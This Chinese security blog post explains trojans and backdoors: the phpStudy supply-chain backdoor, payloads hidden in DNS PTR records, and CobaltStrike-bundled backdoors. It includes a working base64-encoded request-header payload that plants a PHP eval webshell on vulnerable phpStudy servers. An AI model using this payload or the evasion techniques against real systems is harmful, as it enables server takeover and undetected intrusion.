【Web安全】木马与后门

一、认识木马与后门

后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

木马则是入侵者利用网络服务的小漏洞，进行扩展，把小漏洞做成了一个后门，从而“大大方方”进入防护措施后面，进行网络入侵行为。

本着不断学习和探索的态度，这里只是列举一些木马和后门，在安全情势严峻的条件下，之后我们势必会学习到更多的后门和后门案例。如果您在很久之后能读到我的这篇文章，请不要停止学习，可前往此文章所在专栏下，寻找【木马】或【后门】的文章。感谢！

二、木马与后门

1.phpStudy后门

涉及版本：phpstudy 2016 php5.4 和 phpstudy2018 php-5.2.17 和php-5.4.45

后门来由：攻击者通过在原无后门的软件中植入后门，并进行发布。当用户下载篡改后的phpStudy后，就变成了受害者，沦为肉鸡。（听起来就像钓鱼，这种事在移动安全场景中更常见呢）后门代码存在于\ext\phpxmlrpc.dll 模块中 phpStudy2016 和 phpStudy2018自带 php-5.2.17、 php-5.4.45 phpStudy2016 路径 php\php-5.2.17\ext\phpxmlrpc.dll php\php-5.4.45\ext\phpxmlrpc.dll、phpStudy2018 路径 PHPTutorial\php\php-5.2.17\ext\phpxmlrpc.dll、PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll

漏洞证明：

1.安装并启动phpstudy2016

爆木马，咱先不管它，哈哈

2.查看得知此时开启phpstudy的机器ip为10.163.0.49，现在访问10.163.0.49/index.php

将一句话木马system('echo ^<?php @eval($_POST["shell"])?^>>PHPTutorial\WWW\shell.php');，base64编码后，添加get请求键值对Accept-charset:c3lzdGVtKCdlY2hvIF48P3BocCBAZXZhbCgkX1BPU1RbInNoZWxsIl0pP14+PlBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnKTs=

此时，一句话木马写入了服务器,用菜刀连一下即可控制服务器：

总结一下本次的后门事件，黑客伪造了一个看似安全的软件，在其中安插了后门，通过正常访问首页的字段中插入指定操作的base64，进而控制使用phpstudy便捷搭建起来的服务器。

嗯，技术虽高，心比较毒，不宜学习。

2.DNS后门

https://www.freebuf.com/articles/network/185324.html

DNS中的PTR记录可以存放几乎任何我们想要的东西，接下来的要说DNS后门的利用的设计思路。我们可以将payload放在PTR记录中，做好IP和域名的映射。只要在被攻击者主机上用DNS协议反向解析这个IP ，payload就会被接收。最重要的一点在于，大部分的防火墙、入侵检测系统和态势感知系统并不会审计DNS协议，所以这段流量几乎是不会被拦截的；并且这段paylaod并不会被保存在文件中，而是存在内存里，也可以绕过本地杀软的查杀。

3.利用CobaltStrike捆绑后门

CobaltStrike是渗透测试中常用的一个后渗透工具，它可以快速地生成后门并通过其控制目标主机。其中，捆绑型后门是攻击者较为喜欢的一种后门，因为其具有较好的隐蔽性及免杀效果。

安装可以参考：https://www.dazhuanlan.com/2019/12/15/5df63c6420716/ ，如果系统版本不同，百度一下就可以。资源可以在下方【我的资源】进行下载。

首先先在一台机器上，开启CS服务器：

此时在mac上（啥都行）开启客户端：

关于细致的学习和使用，在后面我们仔细说。

使用cs和msf配合，可以打造各种穿透力强的木马，从而成为自己进入“广阔世界”的后门。

这篇文章就到这儿，下回再见。